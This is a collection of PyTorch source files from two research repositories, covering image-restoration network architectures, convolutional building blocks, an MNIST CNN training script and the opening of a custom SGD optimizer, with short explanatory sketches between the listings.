self.tan = nn.Tanh()
# self.soft = nn.Softmax(dim =1)
def forward(self, x):
out1 = F.relu(F.interpolate(self.encoderf1(x),scale_factor=(2,2),mode ='bilinear'))
t1 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
o1 = out1
out1 = F.relu(F.interpolate(self.encoderf2(out1),scale_factor=(2,2),mode ='bilinear'))
t2 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
o2 = out1
out1 = F.relu(F.interpolate(self.encoderf3(out1),scale_factor=(2,2),mode ='bilinear'))
t3 = F.interpolate(out1,scale_factor=(0.0625,0.0625),mode ='bilinear')
# U-NET encoder start
out = F.relu(F.max_pool2d(self.encoder1(x),2,2))
#Fusing all feature maps from K-NET
out = torch.add(out,torch.add(self.tmp2(t3),torch.add(t1,self.tmp1(t2))))
u1 = out
out = F.relu(F.max_pool2d(self.encoder2(out),2,2))
u2 = out
out = F.relu(F.max_pool2d(self.encoder3(out),2,2))
u3=out
out = F.relu(F.max_pool2d(self.encoder4(out),2,2))
u4=out
out = F.relu(F.max_pool2d(self.encoder5(out),2,2))
u5 = out
out = F.relu(F.max_pool2d(self.encoder6(out),2,2))
out = F.relu(F.interpolate(self.decoder1(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u5)
out = F.relu(F.interpolate(self.decoder2(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u4)
out = F.relu(F.interpolate(self.decoder3(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u3)
out = F.relu(F.interpolate(self.decoder4(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u2)
out = F.relu(F.interpolate(self.decoder5(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u1)
# out = F.relu(F.interpolate(self.decoder6(out),scale_factor=(2,2),mode ='bilinear'))
out1 = F.relu(F.max_pool2d(self.decoderf1(out1),2,2))
out1 = torch.add(out1,o2)
t2 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf2(out1),2,2))
out1 = torch.add(out1,o1)
t1 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf3(out1),2,2))
# Fusing all layers at the last layer of decoder
# print(out.shape,t1.shape,t2.shape,t3.shape)
out = torch.add(out,torch.add(self.tmpf3(t3),torch.add(t1,self.tmpf2(t2))))
out = F.relu(F.interpolate(self.decoder6(out),scale_factor=(2,2),mode ='bilinear'))
out = F.relu(self.final(out))
return self.tan(out)
class OUCD(nn.Module):
def __init__(self):
super(OUCD, self).__init__()
self.encoder1 = nn.Conv2d(3, 32, 3, stride=1, padding=1) # b, 16, 10, 10
self.bne1 = nn.InstanceNorm2d(32)
self.encoder2= nn.Conv2d(32, 64, 3, stride=1, padding=1) # b, 8, 3, 3
self.bne2 = nn.InstanceNorm2d(64)
self.encoder3= nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bne3 = nn.InstanceNorm2d(128)
self.encoder4= nn.Conv2d(128, 512, 3, stride=1, padding=1)
self.encoder5= nn.Conv2d(512, 1024, 3, stride=1, padding=1)
self.decoder1 = nn.Conv2d(1024, 512, 3, stride=1, padding=1) # b, 1, 28, 28
self.bnd1 = nn.InstanceNorm2d(64)
self.decoder2 = nn.Conv2d(512, 128, 3, stride=1, padding=1)
self.bnd2 = nn.InstanceNorm2d(32)
self.decoder3 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bnd3 = nn.InstanceNorm2d(16)
self.decoder4 = nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.decoder5 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
# self.decoderf1 = nn.Conv2d(16, 128, 2, stride=1, padding=1)
self.decoderf1 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bndf1 = nn.InstanceNorm2d(64)
self.decoderf2= nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.bndf2 = nn.InstanceNorm2d(32)
self.decoderf3 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
self.bndf3 = nn.InstanceNorm2d(16)
self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
# self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
self.encoderf1 = nn.Conv2d(3, 32, 3, stride=1, padding=1)
self.bnef1 = nn.InstanceNorm2d(32)
self.encoderf2= nn.Conv2d(32, 64, 3, stride=1, padding=1)
self.bnef2 = nn.InstanceNorm2d(64)
self.encoderf3 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bnef3 = nn.InstanceNorm2d(128)
self.encoderf4 = nn.Conv2d(128, 16, 3, stride=1, padding=1)
# self.encoderf5 = nn.Conv2d(128, 128, 3, stride=1, padding=1)
self.final = nn.Conv2d(16,3,1,stride=1,padding=0)
self.bnf = nn.InstanceNorm2d(3)
self.tmp1 = nn.Conv2d(16,32,1,stride=1,padding=0)
self.bnt1 = nn.InstanceNorm2d(32)
self.tmp2 = nn.Conv2d(32,32,1,stride=1,padding=0)
# self.bnt2 = nn.BatchNorm2d(32)
self.tmp3 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmp4 = nn.Conv2d(16,32,1,stride=1,padding=0)
self.tmpf3 = nn.Conv2d(128,32,1,stride=1,padding=0)
self.tmpf2 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmpf1 = nn.Conv2d(32,32,1,stride=1,padding=0)
self.tan = nn.Tanh()
self.sigmoid = nn.Sigmoid()
# self.soft = nn.Softmax(dim =1)
def forward(self, x):
out1 = F.relu(F.interpolate(self.encoderf1(x),scale_factor=(2,2),mode ='bilinear'))
t1 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
o1 = out1
out1 = F.relu(F.interpolate(self.encoderf2(out1),scale_factor=(2,2),mode ='bilinear'))
t2 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
o2 = out1
out1 = F.relu(F.interpolate(self.encoderf3(out1),scale_factor=(2,2),mode ='bilinear'))
t3 = F.interpolate(out1,scale_factor=(0.0625,0.0625),mode ='bilinear')
# U-NET encoder start
out = F.relu(F.max_pool2d(self.encoder1(x),2,2))
#Fusing all feature maps from K-NET
out = torch.add(out,torch.add(self.tmpf3(t3),torch.add(t1,self.tmpf2(t2))))
u1 = out
out = F.relu(F.max_pool2d(self.encoder2(out),2,2))
u2 = out
out = F.relu(F.max_pool2d(self.encoder3(out),2,2))
u3=out
out = F.relu(F.max_pool2d(self.encoder4(out),2,2))
u4=out
out = F.relu(F.max_pool2d(self.encoder5(out),2,2))
out = F.relu(F.interpolate(self.decoder1(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u4)
out = F.relu(F.interpolate(self.decoder2(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u3)
out = F.relu(F.interpolate(self.decoder3(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u2)
out = F.relu(F.interpolate(self.decoder4(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u1)
# Start K-Net decoder
out1 = F.relu(F.max_pool2d(self.decoderf1(out1),2,2))
out1 = torch.add(out1,o2)
t3 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf2(out1),2,2))
out1 = torch.add(out1,o1)
t2 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf3(out1),2,2))
t1 = F.interpolate(out1,scale_factor=(0.5,0.5),mode ='bilinear')
# Fusing all layers at the last layer of decoder
# print(t1.shape,t2.shape,t3.shape,out.shape)
out = torch.add(out,torch.add(self.tmp3(t3),torch.add(self.tmp1(t1),self.tmp2(t2))))
out = F.relu(F.interpolate(self.decoder5(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,out1)
out = F.relu(self.final(out))
return self.tan(out)
class oucd_wo_msff_encoder(nn.Module):
def __init__(self):
super(oucd_wo_msff_encoder, self).__init__()
self.encoder1 = nn.Conv2d(3, 32, 3, stride=1, padding=1) # b, 16, 10, 10
self.bne1 = nn.InstanceNorm2d(32)
self.encoder2= nn.Conv2d(32, 64, 3, stride=1, padding=1) # b, 8, 3, 3
self.bne2 = nn.InstanceNorm2d(64)
self.encoder3= nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bne3 = nn.InstanceNorm2d(128)
self.encoder4= nn.Conv2d(128, 512, 3, stride=1, padding=1)
self.encoder5= nn.Conv2d(512, 1024, 3, stride=1, padding=1)
self.decoder1 = nn.Conv2d(1024, 512, 3, stride=1, padding=1) # b, 1, 28, 28
self.bnd1 = nn.InstanceNorm2d(64)
self.decoder2 = nn.Conv2d(512, 128, 3, stride=1, padding=1)
self.bnd2 = nn.InstanceNorm2d(32)
self.decoder3 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bnd3 = nn.InstanceNorm2d(16)
self.decoder4 = nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.decoder5 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
# self.decoderf1 = nn.Conv2d(16, 128, 2, stride=1, padding=1)
self.decoderf1 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bndf1 = nn.InstanceNorm2d(64)
self.decoderf2= nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.bndf2 = nn.InstanceNorm2d(32)
self.decoderf3 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
self.bndf3 = nn.InstanceNorm2d(16)
self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
# self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
self.encoderf1 = nn.Conv2d(3, 32, 3, stride=1, padding=1)
self.bnef1 = nn.InstanceNorm2d(32)
self.encoderf2= nn.Conv2d(32, 64, 3, stride=1, padding=1)
self.bnef2 = nn.InstanceNorm2d(64)
self.encoderf3 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bnef3 = nn.InstanceNorm2d(128)
self.encoderf4 = nn.Conv2d(128, 16, 3, stride=1, padding=1)
# self.encoderf5 = nn.Conv2d(128, 128, 3, stride=1, padding=1)
self.final = nn.Conv2d(16,3,1,stride=1,padding=0)
self.bnf = nn.InstanceNorm2d(3)
self.tmp1 = nn.Conv2d(16,32,1,stride=1,padding=0)
self.bnt1 = nn.InstanceNorm2d(32)
self.tmp2 = nn.Conv2d(32,32,1,stride=1,padding=0)
# self.bnt2 = nn.BatchNorm2d(32)
self.tmp3 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmp4 = nn.Conv2d(16,32,1,stride=1,padding=0)
self.tmpf3 = nn.Conv2d(128,32,1,stride=1,padding=0)
self.tmpf2 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmpf1 = nn.Conv2d(32,32,1,stride=1,padding=0)
self.tan = nn.Tanh()
self.sigmoid = nn.Sigmoid()
# self.soft = nn.Softmax(dim =1)
def forward(self, x):
out1 = F.relu(F.interpolate(self.encoderf1(x),scale_factor=(2,2),mode ='bilinear'))
# t1 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
o1 = out1
out1 = F.relu(F.interpolate(self.encoderf2(out1),scale_factor=(2,2),mode ='bilinear'))
# t2 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
o2 = out1
out1 = F.relu(F.interpolate(self.encoderf3(out1),scale_factor=(2,2),mode ='bilinear'))
# t3 = F.interpolate(out1,scale_factor=(0.0625,0.0625),mode ='bilinear')
# U-NET encoder start
out = F.relu(F.max_pool2d(self.encoder1(x),2,2))
#Fusing all feature maps from K-NET
# out = torch.add(out,torch.add(self.tmpf3(t3),torch.add(t1,self.tmpf2(t2))))
u1 = out
out = F.relu(F.max_pool2d(self.encoder2(out),2,2))
u2 = out
out = F.relu(F.max_pool2d(self.encoder3(out),2,2))
u3=out
out = F.relu(F.max_pool2d(self.encoder4(out),2,2))
u4=out
out = F.relu(F.max_pool2d(self.encoder5(out),2,2))
out = F.relu(F.interpolate(self.decoder1(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u4)
out = F.relu(F.interpolate(self.decoder2(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u3)
out = F.relu(F.interpolate(self.decoder3(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u2)
out = F.relu(F.interpolate(self.decoder4(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u1)
# Start K-Net decoder
out1 = F.relu(F.max_pool2d(self.decoderf1(out1),2,2))
out1 = torch.add(out1,o2)
t3 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf2(out1),2,2))
out1 = torch.add(out1,o1)
t2 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf3(out1),2,2))
t1 = F.interpolate(out1,scale_factor=(0.5,0.5),mode ='bilinear')
# Fusing all layers at the last layer of decoder
# print(t1.shape,t2.shape,t3.shape,out.shape)
out = torch.add(out,torch.add(self.tmp3(t3),torch.add(self.tmp1(t1),self.tmp2(t2))))
out = F.relu(F.interpolate(self.decoder5(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,out1)
out = F.relu(self.final(out))
return self.tan(out)
```
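The fusion step near the end of the forward pass projects the three multi-scale feature maps to a common 32-channel width with 1x1 convolutions (`tmp1`, `tmp2`, `tmp3`) before adding them to the other branch. A minimal standalone sketch of that pattern, using hypothetical tensor shapes rather than the actual network tensors:
```python
import torch
import torch.nn as nn
import torch.nn.functional as F

# Hypothetical multi-scale features with 16, 32 and 64 channels.
t1 = torch.randn(1, 16, 64, 64)
t2 = torch.randn(1, 32, 32, 32)
t3 = torch.randn(1, 64, 16, 16)

# 1x1 convolutions project every branch to a common 32-channel width.
proj1, proj2, proj3 = nn.Conv2d(16, 32, 1), nn.Conv2d(32, 32, 1), nn.Conv2d(64, 32, 1)

# Resample to a common spatial size, then fuse by element-wise addition,
# mirroring the torch.add(out, torch.add(self.tmp3(t3), ...)) call above.
size = (16, 16)
fused = (F.interpolate(proj1(t1), size=size, mode='bilinear', align_corners=False)
         + F.interpolate(proj2(t2), size=size, mode='bilinear', align_corners=False)
         + F.interpolate(proj3(t3), size=size, mode='bilinear', align_corners=False))
print(fused.shape)  # torch.Size([1, 32, 16, 16])
```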
|
{
"source": "jeya-maria-jose/On-The-Fly-Adaptation",
"score": 3
}
|
#### File: jeya-maria-jose/On-The-Fly-Adaptation/base_networks.py
```python
import math
import random
from math import sqrt
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Function
from torch.nn import init
class ConvBlock(torch.nn.Module):
def __init__(self, input_size, output_size, kernel_size=3, stride=1, padding=1, bias=True, activation='prelu', norm=None):
super(ConvBlock, self).__init__()
self.conv = torch.nn.Conv2d(input_size, output_size, kernel_size, stride, padding, bias=bias)
self.norm = norm
if self.norm =='batch':
self.bn = torch.nn.BatchNorm2d(output_size)
elif self.norm == 'instance':
self.bn = torch.nn.InstanceNorm2d(output_size)
self.activation = activation
if self.activation == 'relu':
self.act = torch.nn.ReLU(True)
elif self.activation == 'prelu':
self.act = torch.nn.PReLU()
elif self.activation == 'lrelu':
self.act = torch.nn.LeakyReLU(0.2, True)
elif self.activation == 'tanh':
self.act = torch.nn.Tanh()
elif self.activation == 'sigmoid':
self.act = torch.nn.Sigmoid()
def forward(self, x):
if self.norm is not None:
out = self.bn(self.conv(x))
else:
out = self.conv(x)
if self.activation != 'no':
return self.act(out)
else:
return out
class DeconvBlock(torch.nn.Module):
def __init__(self, input_size, output_size, kernel_size=4, stride=2, padding=1, bias=True, activation='prelu', norm=None):
super(DeconvBlock, self).__init__()
self.deconv = torch.nn.ConvTranspose2d(input_size, output_size, kernel_size, stride, padding, bias=bias)
self.norm = norm
if self.norm == 'batch':
self.bn = torch.nn.BatchNorm2d(output_size)
elif self.norm == 'instance':
self.bn = torch.nn.InstanceNorm2d(output_size)
self.activation = activation
if self.activation == 'relu':
self.act = torch.nn.ReLU(True)
elif self.activation == 'prelu':
self.act = torch.nn.PReLU()
elif self.activation == 'lrelu':
self.act = torch.nn.LeakyReLU(0.2, True)
elif self.activation == 'tanh':
self.act = torch.nn.Tanh()
elif self.activation == 'sigmoid':
self.act = torch.nn.Sigmoid()
def forward(self, x):
if self.norm is not None:
out = self.bn(self.deconv(x))
else:
out = self.deconv(x)
if self.activation is not None:
return self.act(out)
else:
return out
class Decoder_MDCBlock1(torch.nn.Module):
def __init__(self, num_filter, num_ft, kernel_size=4, stride=2, padding=1, bias=True, activation='prelu', norm=None, mode='iter1'):
super(Decoder_MDCBlock1, self).__init__()
self.mode = mode
self.num_ft = num_ft - 1
self.down_convs = nn.ModuleList()
self.up_convs = nn.ModuleList()
for i in range(self.num_ft):
self.down_convs.append(
ConvBlock(num_filter*(2**i), num_filter*(2**(i+1)), kernel_size, stride, padding, bias, activation, norm=None)
)
self.up_convs.append(
DeconvBlock(num_filter*(2**(i+1)), num_filter*(2**i), kernel_size, stride, padding, bias, activation, norm=None)
)
def forward(self, ft_h, ft_l_list):
if self.mode == 'iter1' or self.mode == 'conv':
ft_h_list = []
for i in range(len(ft_l_list)):
ft_h_list.append(ft_h)
ft_h = self.down_convs[self.num_ft- len(ft_l_list) + i](ft_h)
ft_fusion = ft_h
for i in range(len(ft_l_list)):
ft_fusion = self.up_convs[self.num_ft-i-1](ft_fusion - ft_l_list[i]) + ft_h_list[len(ft_l_list)-i-1]
if self.mode == 'iter2':
ft_fusion = ft_h
for i in range(len(ft_l_list)):
ft = ft_fusion
for j in range(self.num_ft - i):
ft = self.down_convs[j](ft)
ft = ft - ft_l_list[i]
for j in range(self.num_ft - i):
ft = self.up_convs[self.num_ft - i - j - 1](ft)
ft_fusion = ft_fusion + ft
if self.mode == 'iter3':
ft_fusion = ft_h
for i in range(len(ft_l_list)):
ft = ft_fusion
for j in range(i+1):
ft = self.down_convs[j](ft)
ft = ft - ft_l_list[len(ft_l_list) - i - 1]
for j in range(i+1):
# print(j)
ft = self.up_convs[i + 1 - j - 1](ft)
ft_fusion = ft_fusion + ft
if self.mode == 'iter4':
ft_fusion = ft_h
for i in range(len(ft_l_list)):
ft = ft_h
for j in range(self.num_ft - i):
ft = self.down_convs[j](ft)
ft = ft - ft_l_list[i]
for j in range(self.num_ft - i):
ft = self.up_convs[self.num_ft - i - j - 1](ft)
ft_fusion = ft_fusion + ft
return ft_fusion
class Encoder_MDCBlock1(torch.nn.Module):
def __init__(self, num_filter, num_ft, kernel_size=4, stride=2, padding=1, bias=True, activation='prelu', norm=None, mode='iter1'):
super(Encoder_MDCBlock1, self).__init__()
self.mode = mode
self.num_ft = num_ft - 1
self.up_convs = nn.ModuleList()
self.down_convs = nn.ModuleList()
for i in range(self.num_ft):
self.up_convs.append(
DeconvBlock(num_filter//(2**i), num_filter//(2**(i+1)), kernel_size, stride, padding, bias, activation, norm=None)
)
self.down_convs.append(
ConvBlock(num_filter//(2**(i+1)), num_filter//(2**i), kernel_size, stride, padding, bias, activation, norm=None)
)
def forward(self, ft_l, ft_h_list):
if self.mode == 'iter1' or self.mode == 'conv':
ft_l_list = []
for i in range(len(ft_h_list)):
ft_l_list.append(ft_l)
ft_l = self.up_convs[self.num_ft- len(ft_h_list) + i](ft_l)
ft_fusion = ft_l
for i in range(len(ft_h_list)):
ft_fusion = self.down_convs[self.num_ft-i-1](ft_fusion - ft_h_list[i]) + ft_l_list[len(ft_h_list)-i-1]
if self.mode == 'iter2':
ft_fusion = ft_l
for i in range(len(ft_h_list)):
ft = ft_fusion
for j in range(self.num_ft - i):
ft = self.up_convs[j](ft)
ft = ft - ft_h_list[i]
for j in range(self.num_ft - i):
# print(j)
ft = self.down_convs[self.num_ft - i - j - 1](ft)
ft_fusion = ft_fusion + ft
if self.mode == 'iter3':
ft_fusion = ft_l
for i in range(len(ft_h_list)):
ft = ft_fusion
for j in range(i+1):
ft = self.up_convs[j](ft)
ft = ft - ft_h_list[len(ft_h_list) - i - 1]
for j in range(i+1):
# print(j)
ft = self.down_convs[i + 1 - j - 1](ft)
ft_fusion = ft_fusion + ft
if self.mode == 'iter4':
ft_fusion = ft_l
for i in range(len(ft_h_list)):
ft = ft_l
for j in range(self.num_ft - i):
ft = self.up_convs[j](ft)
ft = ft - ft_h_list[i]
for j in range(self.num_ft - i):
# print(j)
ft = self.down_convs[self.num_ft - i - j - 1](ft)
ft_fusion = ft_fusion + ft
return ft_fusion
# Residual dense block (RDB) architecture
class RDB(nn.Module):
def __init__(self, nChannels, nDenselayer, growthRate, scale = 1.0):
super(RDB, self).__init__()
nChannels_ = nChannels
self.scale = scale
modules = []
for i in range(nDenselayer):
modules.append(make_dense(nChannels_, growthRate))
nChannels_ += growthRate
self.dense_layers = nn.Sequential(*modules)
self.conv_1x1 = nn.Conv2d(nChannels_, nChannels, kernel_size=1, padding=0, bias=False)
def forward(self, x):
out = self.dense_layers(x)
out = self.conv_1x1(out) * self.scale
out = out + x
return out
class make_dense(nn.Module):
def __init__(self, nChannels, growthRate, kernel_size=3):
super(make_dense, self).__init__()
self.conv = nn.Conv2d(nChannels, growthRate, kernel_size=kernel_size, padding=(kernel_size-1)//2, bias=False)
def forward(self, x):
out = F.relu(self.conv(x))
out = torch.cat((x, out), 1)
return out
class ConvLayer(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding):
super(ConvLayer, self).__init__()
# reflection_padding = kernel_size // 2
# self.reflection_pad = nn.ReflectionPad2d(reflection_padding)
self.conv2d = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
def forward(self, x):
# out = self.reflection_pad(x)
out = self.conv2d(x)
return out
class UpsampleConvLayer(torch.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride):
super(UpsampleConvLayer, self).__init__()
self.conv2d = nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride=stride, padding=1)
def forward(self, x):
out = self.conv2d(x)
return out
class ResidualBlock(torch.nn.Module):
def __init__(self, channels):
super(ResidualBlock, self).__init__()
self.conv1 = ConvLayer(channels, channels, kernel_size=3, stride=1, padding=1)
self.conv2 = ConvLayer(channels, channels, kernel_size=3, stride=1, padding=1)
self.relu = nn.ReLU()
def forward(self, x):
residual = x
out = self.relu(self.conv1(x))
out = self.conv2(out) * 0.1
out = torch.add(out, residual)
return out
def init_linear(linear):
init.xavier_normal(linear.weight)
linear.bias.data.zero_()
def init_conv(conv, glu=True):
init.kaiming_normal(conv.weight)
if conv.bias is not None:
conv.bias.data.zero_()
class EqualLR:
def __init__(self, name):
self.name = name
def compute_weight(self, module):
weight = getattr(module, self.name + '_orig')
fan_in = weight.data.size(1) * weight.data[0][0].numel()
return weight * sqrt(2 / fan_in)
@staticmethod
def apply(module, name):
fn = EqualLR(name)
weight = getattr(module, name)
del module._parameters[name]
module.register_parameter(name + '_orig', nn.Parameter(weight.data))
module.register_forward_pre_hook(fn)
return fn
def __call__(self, module, input):
weight = self.compute_weight(module)
setattr(module, self.name, weight)
def equal_lr(module, name='weight'):
EqualLR.apply(module, name)
return module
```
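As a quick shape check for the blocks above (assuming the classes in this file are in scope): the default `ConvBlock` preserves spatial size, a kernel-4/stride-2 `ConvBlock` halves it, the default `DeconvBlock` doubles it, and `equal_lr` rescales a module's weight by sqrt(2 / fan_in) on every forward pass. A small sketch with arbitrary layer widths:
```python
import torch

x = torch.randn(2, 16, 32, 32)

same = ConvBlock(16, 32)                           # 3x3, stride 1: keeps 32x32
down = ConvBlock(16, 32, kernel_size=4, stride=2)  # halves to 16x16
up = DeconvBlock(32, 16)                           # 4x4, stride 2: doubles to 64x64

print(same(x).shape)      # torch.Size([2, 32, 32, 32])
print(down(x).shape)      # torch.Size([2, 32, 16, 16])
print(up(same(x)).shape)  # torch.Size([2, 16, 64, 64])

# Equalized learning rate: the underlying weight lives in `weight_orig` and is
# rescaled by sqrt(2 / fan_in) through a forward pre-hook.
eq = equal_lr(torch.nn.Conv2d(16, 16, 3, padding=1))
print(eq(x).shape)        # torch.Size([2, 16, 32, 32])
```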
|
{
"source": "jeya-maria-jose/sparseSGD",
"score": 3
}
|
#### File: jeya-maria-jose/sparseSGD/convolution_network.py
```python
import torch
from torch import nn, optim
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision import datasets
from logger import Logger
batch_size = 128
learning_rate = 1e-2
num_epoches = 20
def to_np(x):
return x.cpu().data.numpy()
train_dataset = datasets.MNIST(
root='./data', train=True, transform=transforms.ToTensor(), download=True)
test_dataset = datasets.MNIST(
root='./data', train=False, transform=transforms.ToTensor())
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False)
class Cnn(nn.Module):
def __init__(self, in_dim, n_class):
super(Cnn, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_dim, 6, 3, stride=1, padding=1),
nn.ReLU(True),
nn.MaxPool2d(2, 2),
nn.Conv2d(6, 16, 5, stride=1, padding=0),
nn.ReLU(True), nn.MaxPool2d(2, 2))
self.fc = nn.Sequential(
nn.Linear(400, 120), nn.Linear(120, 84), nn.Linear(84, n_class))
def forward(self, x):
out = self.conv(x)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out
model = Cnn(1, 10)
use_gpu = torch.cuda.is_available()
if use_gpu:
model = model.cuda()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=learning_rate)
logger = Logger('./logs')
for epoch in range(num_epoches):
print('epoch {}'.format(epoch + 1))
print('*' * 10)
running_loss = 0.0
running_acc = 0.0
for i, data in enumerate(train_loader, 1):
img, label = data
if use_gpu:
img = img.cuda()
label = label.cuda()
img = Variable(img)
label = Variable(label)
out = model(img)
loss = criterion(out, label)
running_loss += loss.data * label.size(0)
_, pred = torch.max(out, 1)
num_correct = (pred == label).sum()
accuracy = (pred == label).float().mean()
running_acc += num_correct.data
optimizer.zero_grad()
loss.backward()
optimizer.step()
# ========================= Log ======================
step = epoch * len(train_loader) + i
# (1) Log the scalar values
info = {'loss': loss.data, 'accuracy': accuracy.data}
for tag, value in info.items():
logger.scalar_summary(tag, value, step)
# (2) Log values and gradients of the parameters (histogram)
for tag, value in model.named_parameters():
tag = tag.replace('.', '/')
logger.histo_summary(tag, to_np(value), step)
logger.histo_summary(tag + '/grad', to_np(value.grad), step)
# (3) Log the images
info = {'images': to_np(img.view(-1, 28, 28)[:10])}
for tag, images in info.items():
logger.image_summary(tag, images, step)
if i % 300 == 0:
print('[{}/{}] Loss: {:.6f}, Acc: {:.6f}'.format(
epoch + 1, num_epoches, running_loss / (batch_size * i),
running_acc / (batch_size * i)))
print('Finish {} epoch, Loss: {:.6f}, Acc: {:.6f}'.format(
epoch + 1, running_loss / (len(train_dataset)), running_acc / (len(
train_dataset))))
model.eval()
eval_loss = 0
eval_acc = 0
for data in test_loader:
img, label = data
if use_gpu:
img = Variable(img, volatile=True).cuda()
label = Variable(label, volatile=True).cuda()
else:
img = Variable(img, volatile=True)
label = Variable(label, volatile=True)
out = model(img)
loss = criterion(out, label)
eval_loss += loss.data * label.size(0)
_, pred = torch.max(out, 1)
num_correct = (pred == label).sum()
eval_acc += num_correct.data
print('Test Loss: {:.6f}, Acc: {:.6f}'.format(eval_loss / (len(
test_dataset)), eval_acc / (len(test_dataset))))
print()
torch.save(model.state_dict(), './cnn.pth')
```
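The evaluation loop above uses the pre-0.4 `Variable(..., volatile=True)` API, which current PyTorch releases ignore; the usual modern equivalent is `torch.no_grad()`. A sketch of the same evaluation written that way, reusing `model`, `criterion`, `test_loader`, `use_gpu` and `test_dataset` from the script above:
```python
# Equivalent evaluation loop for PyTorch >= 0.4, where volatile has no effect.
model.eval()
eval_loss = 0.0
eval_acc = 0
with torch.no_grad():
    for img, label in test_loader:
        if use_gpu:
            img, label = img.cuda(), label.cuda()
        out = model(img)
        loss = criterion(out, label)
        eval_loss += loss.item() * label.size(0)
        eval_acc += (out.argmax(dim=1) == label).sum().item()
print('Test Loss: {:.6f}, Acc: {:.6f}'.format(
    eval_loss / len(test_dataset), eval_acc / len(test_dataset)))
```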
#### File: jeya-maria-jose/sparseSGD/optimnewcpu.py
```python
import torch
from torch.optim import Optimizer
import numpy as np
import pdb
class _RequiredParameter(object):
"""Singleton class representing a required parameter for an Optimizer."""
def __repr__(self):
return "<required parameter>"
required = _RequiredParameter()
class SGD(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
Example:
>>> optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9)
>>> optimizer.zero_grad()
>>> loss_fn(model(input), target).backward()
>>> optimizer.step()
__ http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf
.. note::
The implementation of SGD with Momentum/Nesterov subtly differs from
        Sutskever et al. and implementations in some other frameworks.
Considering the specific case of Momentum, the update can be written as
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + g_{t+1}, \\
p_{t+1} & = p_{t} - \text{lr} * v_{t+1},
\end{aligned}
where :math:`p`, :math:`g`, :math:`v` and :math:`\mu` denote the
parameters, gradient, velocity, and momentum respectively.
        This is in contrast to Sutskever et al. and
